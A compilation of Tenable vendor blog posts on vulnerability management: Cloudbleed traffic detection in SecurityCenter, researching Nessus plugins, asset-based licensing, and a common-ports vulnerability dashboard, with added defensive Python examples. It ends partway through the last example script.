
Leveraging the Cloud to Achieve Comprehensive Asset Visibility, Tracking and Security


The current IT landscape has fundamentally changed the way that organizations view their security and assess their overall risk posture. Technologies like cloud, DevOps deployments and containers behave in a radically different way than traditional assets. For example, they are often shorter lived or they often have owners outside of the IT department. If threats and vulnerabilities aren’t detected on these assets, these differences can lead to security gaps, and these gaps can provide bad actors with a host of new opportunities. With that in mind, Tenable recently commissioned a report from IDC to examine how leveraging the cloud could help with modern security challenges.

Technology Spotlight

This IDC Technology Spotlight, Leveraging the Cloud to Achieve Comprehensive Asset Visibility, Tracking and Security, examines how the evolution of vulnerability management has left organizations with an even greater need for visibility into their assets and vulnerabilities, especially in new asset types like containers. Ayoub also delves into the advantages that can be experienced by organizations that use a cloud-based approach to vulnerability management.

According to IDC, the cloud-hosted security services market is growing rapidly, with vulnerability management being the fastest growing sub-segment. This rise in adoption of cloud-hosted security services is due to several benefits organizations can expect, including:

  • Broad asset coverage, which delivers comprehensive visibility into all assets
  • Integrated user experience, helping to improve productivity
  • Simplified integrations to improve visibility and efficiency
  • Elasticity, allowing organizations to scale as required

The cloud-hosted security services market is growing rapidly

Although cloud solutions can offer significant price and performance advantages, real or perceived data security concerns have deterred organizations from shifting their resources to the cloud in the past. However, those concerns seem to have dissipated somewhat; IDC projected 17.2 percent growth for the cloud-hosted Security and Vulnerability Management (SVM) market from 2014 to 2019.


One of the reasons for this change is the projected cybersecurity workforce shortage. Small, medium and large sized organizations alike, may look to shift their resources to the cloud to benefit not just from cost-savings, but for greater productivity achieved by security professionals who no longer have to manage the application itself when they move to a SaaS option. Rather than hiring the workforce to maintain on-premises security products, those resources can focus on actually using applications to address security challenges.

There’s also an increasing need to protect resources across all form factors, including physical, virtual, public cloud, containers, etc.

Tenable.io

Tenable has been working with many customers who are encountering similar challenges as reported by IDC, including how to account for modern assets like cloud, containers and mobile in their vulnerability management programs.


To address these challenges, Tenable recently announced the debut of Tenable.io. Tenable.io™ is a modern vulnerability management platform that provides the visibility and insight to protect what matters most to an organization. It delivers a fresh, asset-based approach that accurately tracks resources while accommodating dynamic assets like cloud and containers. Its streamlined and intuitive user experience, including pre-built templates and a consistent user interface, delivers value quickly and helps teams accomplish more.

With Tenable.io, customers benefit from an elastic licensing approach based on assets instead of IP addresses, making it easier to custom fit a vulnerability management solution to each unique environment. This approach makes it easy to accurately identify, track and license all of the assets in a given environment, without double counting, and eliminates the challenges associated with licensing mobile devices, public cloud instances, and short-lived virtual machines.

A fully documented API and integrated SDK help automate the sharing of Tenable.io capabilities and vulnerability data, and allow organizations to build on the Tenable.io platform. Pre-built integrations for patch management, credential management, mobile device management and other solutions make it easy for admins to leverage their existing investments.

For additional information, please download the full Technology Spotlight from the Tenable website.

Sources

IDC Technology Spotlight: Leveraging the Cloud to Achieve Comprehensive Asset Visibility, Tracking, and Security


Detecting Cloudflare Usage


On February 17, 2017 a Google researcher stumbled onto a situation that some are calling Cloudbleed, where services running on Cloudflare servers were inadvertently causing chunks of uninitialized memory to be mixed with valid data. The Google researcher posted this description on the discovery. The uninitialized memory can contain encryption keys, passwords and other sensitive data. This data leakage is very critical due to the amount of caching found on the internet today. With the widespread caching services, the extent of the leakage may be very hard to determine. Cloudflare reports that the bug has been patched and resolved; you can read more about this bug on the Cloudflare blog.

What does this mean to your company?

As this breach is passive in nature, the cached data has not yet been reported to be exploited. With the risk of passwords, encryption keys and other Personally Identifiable Information (PII) as part of the possible data leak, your company must be able to determine if data has been compromised or not. There are several lists of domain names published on github.com. However, for customers using SecurityCenter Continuous View® (SecurityCenter CV™) with Passive Vulnerability Scanner® (PVS™) and Log Correlation Engine® (LCE®), you can easily track and identify which internal systems are using services running on Cloudflare systems. After identifying the hosts and services used, the security analysts can begin to understand the risk to your organization.

Locating the data

When using PVS and LCE, the best practice is to have the PVS real-time logs sent to LCE for further analysis. The PVS configuration has a section called Realtime Events with two settings to enable: Log Realtime Events To Realtime Log File and Enable Realtime Event Analysis. These settings enable PVS to log session-level events similar to NetFlow. Next, you must configure the syslog settings to send the data to LCE. Once real-time event data is sent to LCE, you will be able to see who is communicating with services using Cloudflare. Additionally, you can install the LCE client on DNS servers, which enables LCE to track DNS queries.

PVS real-time setup

SecurityCenter CV has several types of asset lists that you can use to identify traffic patterns or groups of hosts with similar vulnerabilities or risks. The asset list best suited for detecting Cloudflare is a Watchlist asset. A Watchlist asset is a group of IP addresses that are of interest and need to be monitored but which may not be local to your environment; Cloudflare IPs are an example. We looked up the Cloudflare IP address blocks using the American Registry for Internet Numbers (ARIN). To create the asset, go to Assets and click Add. Next, click on Type Watchlist, give the asset the name Cloudflare, and add the following subnets to the newly created asset:

  • 104.16.0.0/12
  • 108.162.192.0/18
  • 162.158.0.0/15
  • 172.64.0.0/13
  • 173.245.48.0/20
  • 198.41.128.0/17
  • 199.27.128.0/21

Create the asset

Now click on Submit to save the asset. After creating the asset, and before proceeding to Analysis, allow the asset to update.

Asset is ready to use

Locating systems with a possible data leakage

To locate the events that are evidence of hosts using services running Cloudflare, you must first go to Analysis > Events. According to the Cloudflare blog post, the dates of the greatest risk are February 13, 2017 to February 18, 2017. By expanding the filters, you can add in the explicit dates and the Cloudflare Asset. When adding the first date, be sure to set the time to 00:00; this will ensure that the filter starts at the beginning of February 13. Next, for the second date, set the time to 23:59, to ensure that the full day is captured.

Setting the date/time

The next step is to add the asset as part of the filter; this is a two-step process. First, click on Select Filters, and then add the Asset filter. The Asset filter is now available on the left-hand side of the screen; click All in the Asset field and enter the name of the Cloudflare asset:

Cloudflare asset

Next click on Apply All to see the events related to Cloudflare. The first view you will see is the List of Event Types; these are the high level summary categories of events. For example, here are several event types that can help determine the risk your network is exposed to:

Event types

The web-access shows PVS tracking the type of HTTP calls made, such as web content, JPG files, PDF files, HTTP requests, and several others. Click on web-access, then select Jump to Raw Syslog Events in the upper right hand corner of the screen. Click on the plus sign + next to each log, and you can review the URL related HTTP request parameters. You can then review the details such as the source of the HTTP request and the URL visited. At this point, you must create a list of URLs that are related to your business risk and begin to investigate if your organization is at further risk.
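The procedure above amounts to three checks: is the destination inside the Cloudflare watchlist blocks, does the event fall inside the exposure window, and which internal host requested which URL. The following script, added here as an illustration rather than code from Tenable or the original post, performs the same triage offline over a handful of constructed session events. The pipe-delimited event layout (timestamp|source IP|destination IP|URL) is an assumption for the example and is not the PVS real-time log format; the address blocks and the February 13 to 18, 2017 window are the ones given in the post.

```python
import ipaddress
from datetime import datetime, timezone

# Cloudflare address blocks exactly as listed in the post (looked up via ARIN).
CLOUDFLARE_BLOCKS = [ipaddress.ip_network(block) for block in (
    "104.16.0.0/12", "108.162.192.0/18", "162.158.0.0/15", "172.64.0.0/13",
    "173.245.48.0/20", "198.41.128.0/17", "199.27.128.0/21",
)]

# Exposure window named in the post: start of Feb 13 to end of Feb 18, 2017.
WINDOW_START = datetime(2017, 2, 13, 0, 0, 0, tzinfo=timezone.utc)
WINDOW_END = datetime(2017, 2, 18, 23, 59, 59, tzinfo=timezone.utc)

# Constructed sample session events. The pipe-delimited layout
# (timestamp|source IP|destination IP|URL) is an assumption for this example,
# not PVS's real-time log format.
SAMPLE_EVENTS = """\
2017-02-12T23:59:00Z|10.1.1.20|104.16.5.5|https://example-saas.test/login
2017-02-14T09:15:00Z|10.1.1.20|104.16.5.5|https://example-saas.test/login
2017-02-14T09:16:00Z|10.1.1.21|198.41.130.9|https://example-chat.test/api
2017-02-15T12:00:00Z|10.1.1.22|93.184.216.34|https://not-cloudflare.test/
2017-02-18T23:58:00Z|10.1.1.20|172.70.1.1|https://example-saas.test/dashboard
2017-02-19T00:01:00Z|10.1.1.23|104.16.5.5|https://example-saas.test/login
"""


def is_cloudflare(ip: str) -> bool:
    """True when the address falls inside one of the watchlist blocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in block for block in CLOUDFLARE_BLOCKS)


def parse_event(line: str) -> dict:
    """Split one event line into its fields; timestamps are treated as UTC."""
    ts, src, dst, url = line.strip().split("|", 3)
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"time": when, "src": src, "dst": dst, "url": url}


def in_window(when: datetime) -> bool:
    """Inclusive check against the exposure window (00:00 on the 13th to 23:59 on the 18th)."""
    return WINDOW_START <= when <= WINDOW_END


def find_exposed_sessions(log_text: str) -> list:
    """Events inside the exposure window whose destination is a Cloudflare block."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if in_window(event["time"]) and is_cloudflare(event["dst"]):
            hits.append(event)
    return hits


def summarize_by_host(log_text: str) -> dict:
    """Internal source host -> sorted list of URLs it reached via Cloudflare in the window."""
    summary = {}
    for event in find_exposed_sessions(log_text):
        summary.setdefault(event["src"], set()).add(event["url"])
    return {host: sorted(urls) for host, urls in summary.items()}


if __name__ == "__main__":
    # The resulting host -> URL list is the starting point for the business-risk
    # review the post describes (which services, and therefore which credentials,
    # were in play during the window).
    for host, urls in sorted(summarize_by_host(SAMPLE_EVENTS).items()):
        print(host)
        for url in urls:
            print("   ", url)
```

Of the six constructed events, only three survive both filters: the first is before the window, the fourth goes to a non-Cloudflare address, and the last is after the window. Note that the window check uses the same 00:00 and 23:59 boundaries the post tells you to set in the SecurityCenter date filter.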

Web request

Another great feature of tracking PVS event data with LCE is the ability to historically track vulnerabilities. In the following sample, you can see my lab has a Mac OS X system running a vulnerable browser. In this case, the vulnerability might not increase risk of the Cloudflare breach, but getting a good historic view of vulnerabilities detected by PVS is a great feature when combining PVS and LCE together.

Tracking vulnerabilities with LCE

Wrapping up

SecurityCenter CV is a powerful tool when fully implemented, and can aid your investigations when there are large data breaches such as Cloudbleed. By using LCE to track real-time events in PVS, you have a good historic view of vulnerability data and protocol level events. Combining PVS and LCE enables your organization to see the traffic and understand the content of the session. As the context of the Cloudflare traffic is revealed, you can better understand and assess the risk to your organization. Tenable provides our customers with a full-featured threat and vulnerability analysis that far exceeds those of our competition.

Understanding Tenable Plugins


Are you pluggin’ along looking for vulnerabilities? The heart of Tenable vulnerability detection comes from the individual tests called plugins: simple programs that check for specific flaws. Each plugin contains a vulnerability description, fix recommendations, and algorithms for detection. Tenable products receive new plugins nightly, which keep the tests current and relevant.

Finding plugin information

SecurityCenter® has at least four places to research plugins:

1. Click on your userid (top right) to find the Plugins. This is the quickest source while working on SecurityCenter. You can also use a URL such as: https://<SecurityCenterhostname>/#plugins

SecurityCenter plugin source #1

2. On the analysis screens and plugin screens, click the i icon next to the Plugin ID. This is the most informative source.

SecurityCenter plugin source #2

3. Click on Analysis / Vulnerabilities and choose the Vulnerability Detail List (VDL) tool to find many explanations related to individual plugins.

SecurityCenter plugin source #3

4. Log in as administrator. The initial Overview dashboard (bottom right) lists the plugins currently loaded in SecurityCenter.

SecurityCenter plugin source #4

You can also find plugins in other Tenable products.

Nessus® takes a few clicks to drill down to plugins. Go to Policies / New Policy / Advanced Scan /Plugins. Then select a family on the left and a plugin on the right:

Nessus plugins

You can also see Nessus plugin information in scan results and by drilling down on individual plugin results. This provides similar information as VDL in SecurityCenter.

Tenable.io™ provides very similar information as Nessus, both in content and location (see Tenable.io Vulnerability Management for information about this new application).

You can use three places on the Internet to research plugins:

  • www.tenable.com/plugins/: lists plugins by family and lets you search by Plugin Name or Plugin ID. This is the quickest place for lookups.
  • Tenable Community: provides technical discussions on individual plugins. Use this site to see how a plugin is used by others.
  • Google: Of course, an organic search for a Nessus Plugin Name or ID is often the easiest to remember.

Explanation of plugin sources

Each plugin source has its advantages and peculiarities. They vary in the information provided. Here are the nine sources, comparing their advantages and unique details.

Plugin

This source provides many fields to search on. I use Plugin Name or Plugin ID most often.

This view has several unique characteristics. First, it shows the plugins currently in SecurityCenter:

Plugin page

Second, this source enables you to search against the audit files that have been activated in your SecurityCenter installation. For example, you can see the compliance password tests:

Compliance password tests

i icon

Clicking the small i icon results in voluminous information. If you carefully search through the Details tab’s Solution section, you can find the plugin’s source filename:

Plugin source filename

A second Source tab (top right) displays the plugin’s actual scripting in Tenable’s proprietary Nessus Attack Script Language (NASL):

NASL scripting

Not all plugins are provided in NASL. Other plugins are compiled to protect confidential techniques.

VDL

You can find a gold mine of information in the VDL analysis tool. This is usually the best resource for researching plugin results.

  • The Plugin output field is one of the most valuable fields, because you can see the actual response from the target during testing. It stands out with green-on-black coloring:

Plugin output

  • The VDL output is the best for assessing risk and how the CVSS score was tallied. It includes the vector, the version, and more.
  • If a publicly-known exploit is available, the VDL will provide details. In this example, the specific Metasploit module is specified:

Publicly known exploit

  • VDL includes ties to many industry vulnerability sources like BID, IAVM, CVE, and CERT announcements:

Industry vulnerability sources

  • VDL also references frameworks like 800-53, CSF, PCI, ISO 27000, Critical Security Controls (formerly SANS top 20) and several others. Tenable provides audit files, which in the individual stanzas correlate the framework modules by tags in the Reference field. The tags enable framework dashboards, reports, and Assurance Report Cards® to automatically populate with appropriate scan results related to the framework. A listing of related audit files can be found by posting a specific question on the Tenable Community.
  • The Host field includes items such as the date that the vulnerability was first seen. It also gathers asset identity details like DNS, NetBIOS, and MAC address.

Admin overview dashboard

After logging in as admin, I like to sort by modified date to see when plugins arrived. The date for the newest plugin downloads should be less than 24 hours (except for an offline SecurityCenter). I also like to see what issues the recent plugins address.

Nessus

Finding plugin information takes several steps. Nessus also provides many fields about a plugin.

Plugin fields

To identify risk severity, Nessus shows both CVSS versions two and three in the detailed view.

Tenable.io

Similar to Nessus.

www.tenable.com/plugins/

This has been my favorite interface to work with for quick lookups. It also lists plugins by families. The Plugins portal includes several pages:

  • Helpful screens on newest plugins and options on obtaining an activation code for plugin updates.
  • View all plugins provides the latest count of plugins at the top. The page is organized by research plugin families.
  • Search: I often start my research here. I usually search by Plugin Name and Plugin ID.

Example: A customer asked if Tenable had any tests for nginx. I typed in nginx, searched with Plugin Name, and was surprised by how many plugins were listed.

TIP: Though the page suggests using double quotes for an exact search, I have not had success with that search technique.

Be aware that this page is showing Nessus plugins only. To see the PVS™ plugins, go to bottom left of the page, click Product Resources, and then click PVS Plugins.

Tenable Community

This portal provides technical discussions between customers and Tenable support staff. I often search it to see how others use a particular plugin.

This site is especially helpful for late-breaking vulnerabilities. Here is an example with the recent GRIZZLY STEPPE exploit:

Tenable Community

Google

Even if you forget the first eight sources, you will probably remember to use Google (or another search tool). It often points to information from sources 7 and 8.

Common questions and tips

Tip #1: What is the best plugin?

I nominate Nessus Scan Information, #19506. I chose this plugin even though it does not do any vulnerability testing. It gathers many scan forensics like how long the scan took, if the credentials worked, what scanner was used, and more.

Details include:

  • Policy name (both hash and field)
  • Scan options
  • Performance settings
  • When started and how long scan ran
  • Type of Nessus scan (agent or sensor)
  • Credentialed scan successful or not
  • Credentials used

Plugin 19506 details

This plugin is often used as part of a daily discover scan to identify a new host on the network. See my blog about Favorite SecurityCenter Asset Lists for details.

What is your favorite plugin? Let us know at the Tenable Community. Also feel free to request plugins you would find helpful that we currently do not provide.

Tip #2: Can customers code plugins?

Yes. Some sage advice comes from Ron Gula, Tenable co-founder, in a Tenable Community posting:

Tenable does not officially support custom NASLs as part of our support program but if you look in the API section you will see plenty of responses from Tenable staff answering questions about NASLs in general.

Most of the time, what people need to do with a NASL is actually already covered by another NASL or covered more easily by writing an .audit policy.

You can easily add tests to an audit file with PowerShell commands for Windows targets, or with a Linux command or script.

Tip #3: How do I set up a plugin-specific scan?

Identify the plugin IDs and their family that you want to use in the policy. Scan policies that are crafted with only individual plugins do not change their contents after nightly updates.

The Nessus User’s Guide provides excellent directions on setting up the scan.

SecurityCenter provides a helpful search filter for locating the individual plugins to build a new scan policy:

SecurityCenter search filter

Tip #4: What dates can I find on plugins?

Plugins have four different dates: vulnerability release, patch release, initial plugin release, and latest date for plugin modifications. You can find two additional dates in the plugin results: when the vulnerability was originally discovered on a particular system and when the vulnerability was last observed. The periodicity of the last two dates depends upon the frequency of scans.

Tip #5: Which plugins do not count against the IP license?

The answer is in the SecurityCenter User’s Guide, but know that this list does change:

SecurityCenter User Guide information

Summary

Plugins are invaluable tests that Tenable provides for tracking down vulnerabilities. You can find detailed plugin information within the products or on the internet. While Tenable provides lots of good information, sharing tips with other users is often quite helpful. Please share your plugin tips or questions in the Tenable Community!

Elastic Infrastructure Demands Elastic Asset Licensing


Have you ever asked yourself why vulnerability management products are still licensed according to the quantity of scanned IP addresses? Maybe you have learned to accept it. Vendors have done it this way for years. This is how it works. So what is the problem?

The IP-based licensing issue

An IP address no longer uniquely identifies an asset ... a single asset can consume multiple licenses

The problem is that with virtual infrastructure and mobile laptops, tablets and phones, an IP address no longer uniquely identifies an asset. My laptop’s IP address changes as it moves from my home office to the corporate office and then to a hotel. Vulnerability scans performed when my laptop is at these different locations will identify my laptop as three different devices and will create a separate record for each identified device. IP-based licensing isn’t just a problem for laptops. Many servers have multiple network interfaces - one for production, one for administration, and one for backup - each with a different IP address. The result: a single asset can consume multiple vulnerability management licenses.

Customers and vulnerability management vendors all recognize the problem and negotiate workable compromises. For example, a customer knows they have 10,000 assets, but the VM product identifies 12,000 IPs. The customer negotiates a discount based on the discrepancy and life goes on. No problem, correct?

Corrupted IP-based metrics


Unfortunately, license negotiation is only the tip of the iceberg. Arguably, a more significant problem is corrupted vulnerability management metrics. Let’s take another look at the example of a laptop having been scanned as three different IPs. Let’s assume that three critical vulnerabilities were discovered by each scan. The security team’s vulnerability reports include three entries for the laptop, each with three critical vulnerabilities. IT operations connects to the laptop and remediates the ten critical vulnerabilities. They then run a verification scan against the current IP address to confirm the vulnerabilities have been remediated. However, the remediation scan won’t update the vulnerability status for the prior IP addresses. This makes the IT operations team look ineffective and causes them to chase their tail, pursuing non-existent assets. In turn, this creates unnecessary friction between the security and operations teams.

Elastic Asset Licensing

Tenable.io Vulnerability Management tackles this problem head on with Elastic Asset Licensing, which uses an advanced asset identification approach. A single asset may have multiple attributes that Tenable.io can use to positively identify it as a specific asset. Some example attributes in addition to IP address are:

  • Tenable UUID
  • BIOS UUID that is found in its firmware
  • MAC address that is stored in its networking hardware
  • NetBIOS name
  • Fully qualified domain name (FQDN)

An authoritative identifier eliminates double and triple asset counting

The Tenable UUID may have caught your eye. Tenable.io agents and authenticated scans on supported platforms can assign a Tenable universally unique ID to an asset. This authoritative identifier eliminates double and triple asset counting, and greatly improves the accuracy of vulnerability management metrics. At last, security and operations can have a fact-based dialogue about the state of assets and their vulnerabilities.


Tenable.io tracks specific assets
Tenable.io can track a specific asset, even when its attributes like FQDN, IPv4 and MAC address are changing


Decommissioning assets

So far, I have talked about the problem of IP-based licensing. Now, consider the problem of decommissioning assets. First, some background. Today’s on-demand IT environments are highly elastic. For example, virtual machines can be spun up, scanned, spun down - all within a few hours - and then never seen again. Additionally, physical assets are typically decommissioned after 3-5 years, resulting in a 20-33% annual decommission rate.

With most vulnerability management products, these “absent-without-leave” (AWOL) assets consume licenses unless and until a manual reclamation project frees the licenses - and who really wants to be assigned to a digital archeology project like that?

Tenable.io Elastic Asset Licensing automatically reclaims licenses from assets that have not been scanned for 90 days

Tenable.io Elastic Asset Licensing solves the “AWOL problem” by automatically reclaiming licenses from assets that have not been scanned for 90 days, without requiring resources to conduct a manual digital archeology project. Although the licenses are reclaimed after 90 days, the asset and vulnerability data is not deleted. It remains for fifteen months. So if the AWOL asset reappears, the new asset and scan data will be appended to the existing data to deliver an accurate picture of the asset and its vulnerabilities.
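To make the two problems in this post concrete (one laptop counted as three IP-based records, and AWOL assets holding licenses), here is a small inventory model, added as an illustration and not Tenable's own code or documented matching algorithm. It keys assets on the identifier attributes the post lists rather than on IP, collapses the three-location laptop and the three-NIC server into one asset each, lets a remediation scan at any IP clear the asset's findings, and reclaims licenses after the 90 days the post states while retaining the data. The identifier precedence, the 456-day approximation of "fifteen months", the sample records and the "today" date are all assumptions constructed for the example.

```python
from dataclasses import dataclass, field
from datetime import date, timedelta

# Identifier precedence used by this illustration. The ordering is an assumption
# for the example, not Tenable's documented matching algorithm. IP is never a key.
IDENTITY_KEYS = ("tenable_uuid", "bios_uuid", "mac", "netbios", "fqdn")
RECLAIM_AFTER = timedelta(days=90)      # license reclaimed after 90 unscanned days (from the post)
RETAIN_DATA_FOR = timedelta(days=456)   # "fifteen months", approximated as 456 days (assumption)
AS_OF = date(2017, 5, 1)                # constructed "today" for the example


@dataclass
class Asset:
    ids: dict = field(default_factory=dict)      # identifier name -> value
    ips_seen: set = field(default_factory=set)   # every IP the asset was scanned at
    vulns: set = field(default_factory=set)      # findings from the most recent scan
    last_scanned: date = date.min


class AssetInventory:
    def __init__(self):
        self.assets = []

    def _match(self, record: dict):
        """Return the existing asset sharing the highest-precedence identifier, if any."""
        for key in IDENTITY_KEYS:
            value = record.get(key)
            if not value:
                continue
            for asset in self.assets:
                if asset.ids.get(key) == value:
                    return asset
        return None

    def ingest(self, record: dict) -> Asset:
        asset = self._match(record)
        if asset is None:
            asset = Asset()
            self.assets.append(asset)
        for key in IDENTITY_KEYS:          # simplification: one value per identifier
            if record.get(key):
                asset.ids[key] = record[key]
        asset.ips_seen.add(record["ip"])
        # A newer scan of the same asset replaces its findings, so a remediation
        # scan clears vulnerabilities regardless of which IP it was run against.
        if record["scanned"] >= asset.last_scanned:
            asset.vulns = set(record["vulns"])
            asset.last_scanned = record["scanned"]
        return asset

    def licensed(self, today: date) -> list:
        """Assets still holding a license: scanned within the last 90 days."""
        return [a for a in self.assets if today - a.last_scanned < RECLAIM_AFTER]

    def retained(self, today: date) -> list:
        """Assets whose data is still kept, including those whose license was reclaimed."""
        return [a for a in self.assets if today - a.last_scanned < RETAIN_DATA_FOR]


def naive_ip_count(records: list) -> int:
    """What an IP-based license count would report for the same scans."""
    return len({r["ip"] for r in records})


def build_inventory(records: list) -> AssetInventory:
    inventory = AssetInventory()
    for record in records:
        inventory.ingest(record)
    return inventory


# Constructed scan records (all values are made up for the example).
LAPTOP_MAC = "00:11:22:33:44:55"
SERVER_UUID = "tenable-uuid-server-0001"
SAMPLE_RECORDS = [
    # The same laptop scanned at home, office and hotel: three findings each time.
    {"ip": "192.168.1.5", "mac": LAPTOP_MAC, "fqdn": "laptop1.example.test", "scanned": date(2017, 4, 1), "vulns": {"V1", "V2", "V3"}},
    {"ip": "10.0.0.7", "mac": LAPTOP_MAC, "fqdn": "laptop1.example.test", "scanned": date(2017, 4, 5), "vulns": {"V1", "V2", "V3"}},
    {"ip": "172.16.9.3", "mac": LAPTOP_MAC, "fqdn": "laptop1.example.test", "scanned": date(2017, 4, 10), "vulns": {"V1", "V2", "V3"}},
    # Verification scan after remediation, run against the office IP only.
    {"ip": "10.0.0.7", "mac": LAPTOP_MAC, "fqdn": "laptop1.example.test", "scanned": date(2017, 4, 20), "vulns": set()},
    # One server with three NICs: a different MAC and IP per interface, one Tenable UUID.
    {"ip": "10.0.1.10", "mac": "aa:aa:aa:00:00:01", "tenable_uuid": SERVER_UUID, "scanned": date(2017, 4, 25), "vulns": {"V9"}},
    {"ip": "10.0.2.10", "mac": "aa:aa:aa:00:00:02", "tenable_uuid": SERVER_UUID, "scanned": date(2017, 4, 25), "vulns": {"V9"}},
    {"ip": "10.0.3.10", "mac": "aa:aa:aa:00:00:03", "tenable_uuid": SERVER_UUID, "scanned": date(2017, 4, 25), "vulns": {"V9"}},
    # A short-lived VM scanned once in January and never seen again.
    {"ip": "10.0.9.1", "tenable_uuid": "tenable-uuid-vm-0042", "scanned": date(2017, 1, 5), "vulns": {"V4"}},
]

if __name__ == "__main__":
    inv = build_inventory(SAMPLE_RECORDS)
    print("IP-based count:", naive_ip_count(SAMPLE_RECORDS))
    print("asset-based count:", len(inv.assets))
    print("licensed as of", AS_OF, ":", len(inv.licensed(AS_OF)))
    print("retained as of", AS_OF, ":", len(inv.retained(AS_OF)))
```

Running it shows seven IP-based records collapsing to three assets, the laptop ending with zero open findings after a single verification scan, and the January VM dropping out of the licensed set while its record is still retained. The one-value-per-identifier simplification means the server keeps only the last MAC seen; a production implementation would keep every observed value per attribute.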

Summary

Rigid IP-based licensing had a good run, but the time has come for it to be replaced by Elastic Asset Licensing with its greatly improved asset identification and automatic license reclamation.

Vulnerabilities by Common Ports Dashboard


Vulnerabilities within network services may result in data loss, denial of service, or allow attackers to facilitate attacks against other devices. Checking for insecure or non-essential services is critical to reducing risk on the network. By identifying open ports along with their associated services, you can ensure those services are necessary and that the associated risks are mitigated accordingly. Leveraging the enhanced vulnerability management capabilities of Tenable.io™ provides an effective way to detect port- and service-related vulnerabilities, and provides insight into hidden security risks, enabling you to make better informed decisions to protect your organization.


The vast majority of network attacks are focused around easily identified vulnerabilities which can be exploited. Targeted attacks utilize a particular vulnerability and a well defined methodology. The Tenable.io Vulnerabilities by Common Ports dashboard leverages a variety of port filters to display vulnerability information in multiple ways. This dashboard can assist you in identifying any potential risk associated with open ports and services.

Vulnerabilities by Common Ports dashboard

What are we protecting and why are open ports important?

A port can be thought of as a refinement of a computer's IP address. A packet destined for an IP address will be routed to the device that owns that particular IP address. This IP address only identifies the device on the network. A port further defines where that packet should be delivered, and defines the type of connection that should be made. An open port is essential for devices using a specific protocol to connect with each other. The Internet Assigned Numbers Authority (IANA) has developed several port categories:

  • 1 to 1023 are known as Well Known Ports
  • 1024 to 49151 are known as Registered Ports
  • 49152 to 65535 are known as Dynamic Ports

Well Known Ports usually make some type of network connection, and are typically assigned to a particular network protocol. These well known ports are described by the IANA as ports that “can only be used by system (or root) processes or by programs executed by privileged users.” Ports in this range are assigned a specific network protocol. Registered Ports are defined as ports that “can be used by ordinary user processes or programs executed by ordinary users.” Registered ports are typically available to any program that wishes to use them. While the IANA does in fact register port numbers in this range, they do not assign a network protocol. Finally, Dynamic Ports are defined as “unassigned and unregistered ports for private applications, client-side processes, or other processes that dynamically allocate port numbers.”

Increasing network visibility with port usage data

“Common ports” is a further refinement of the port ranges of Well Known Ports to describe those ports that are commonly found across multiple systems. For example, you will likely find ports such as 22/SSH, 25/SMTP, 80/HTTP, and 443/HTTPS, open within most organizations. Vulnerabilities associated with those ports can be easily targeted for intrusion by attackers. Understanding what ports are open within the network is a good step in reducing the probability of compromise, and in some cases improving performance.


Network attacks are not always quickly identifiable. Many attacks are low and slow, creating command and control channels that allow them to exfiltrate more data and remain undetected for longer periods of time. The complexity of networks, and the multitude of open ports across an organization make identifying threats increasingly difficult. The simplest, most straightforward, and costliest approach is a reactive stance where you wait for something to happen and fix it. But that’s not the best approach. The best solution is to proactively scan and analyze the network infrastructure. Tenable.io enables analysts to compare known open ports between scans. New active ports and vulnerabilities can be detected, avoiding potential blind spots where new services are installed or enabled.

Setting attainable goals

The Vulnerabilities by Common Ports dashboard identifies vulnerabilities associated with commonly used ports, and provides analysts with a reference point to identify port related vulnerabilities. This is not to say that ports themselves are vulnerable, as ports themselves do not have vulnerabilities. Vulnerabilities exist in the services associated with the ports. During a scan, ports are queried. The results of the query may be a banner, or other information that is returned by the service running on the specified port. The information is utilized to quickly and easily determine what service is running on the port, and if a vulnerability has been identified.

Two components that aid analysts in easily attaining these goals are the Counting Hosts by Common Ports and the Port and Protocol components. Each component communicates risks and aids in the identification of vulnerabilities, unknown services, or backdoors, which are associated with various open ports and services. The Counting Hosts by Common Ports component enumerates vulnerable hosts providing details based on specific ports and severity levels.

Counting Hosts by Common Ports component

The Port and Protocol component also provides a count of vulnerabilities by severity level, adding active and passive vulnerability results by TCP and UDP protocol. Port ranges from 0-1024, covering all Well Known Ports, along with severity levels of low, medium, high, and critical, are displayed. With each component, a percentage of exploitable vulnerabilities is also displayed.

Port and Protocol component

Using CVSS to identify vulnerabilities by ports

The Common Vulnerability Scoring System (CVSS) provides a robust and useful scoring system for vulnerabilities. CVSS is owned and managed by FIRST, a US-based non-profit organization, whose mission is to help computer security incident response teams across the world.

CVSS is widely used, providing an open and universal standard for severity ratings, and helps determine the urgency and priority of responses. Vulnerabilities can be quickly identified and tracked based on CVSS score. Within the dashboard’s CVSS Vulnerability Counts per Port component, vulnerabilities can be selected by severity or port range. Analysts can quickly identify and select vulnerabilities and mitigate risks due to unnecessary and vulnerable services.

The CVSS Vulnerability Counts per Port component uses a combination of CVSS scores and severity ranking to communicate the risk of discovered vulnerabilities.

CVSS Vulnerability Counts Per Port component

Details for vulnerabilities on ports below 1024 and above 1024 are included, along with separate filters for FTP, SSH, SMTP, HTTP and HTTPS. The colors used to communicate the severity levels are yellow (medium), orange (high), and red (critical).
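To make the dashboard's arithmetic concrete, the following is an added example (not Tenable's own dashboard code) that rebuilds the three component views described above from a constructed list of findings: severity bands from CVSS scores, counts per port range and protocol, counts for the named service filters, distinct-host counts per port, and the percentage of exploitable findings. The CVSS bands follow the CVSS v3 qualitative scale; the service-to-port mapping uses the standard IANA assignments; the `Finding` shape and sample data are assumptions for the example.

```python
"""Added example: recompute the Vulnerabilities by Common Ports views from findings."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, Tuple

# Service filters named in the post, mapped to their standard IANA ports
# (the port numbers are standard assignments, not taken from the post).
SERVICE_PORTS = {"FTP": {21}, "SSH": {22}, "SMTP": {25}, "HTTP": {80}, "HTTPS": {443}}
SEVERITY_ORDER = ["none", "low", "medium", "high", "critical"]


@dataclass(frozen=True)
class Finding:
    """One vulnerability result; the field set is an assumption for this example."""
    host: str
    port: int
    protocol: str      # "tcp" or "udp"
    cvss: float        # CVSS base score, 0.0-10.0
    exploitable: bool  # a public exploit is known for this finding


def severity(cvss: float) -> str:
    """CVSS v3 qualitative bands: 0 none, 0.1-3.9 low, 4-6.9 medium, 7-8.9 high, 9-10 critical."""
    if cvss <= 0.0:
        return "none"
    if cvss < 4.0:
        return "low"
    if cvss < 7.0:
        return "medium"
    if cvss < 9.0:
        return "high"
    return "critical"


def port_bucket(port: int) -> str:
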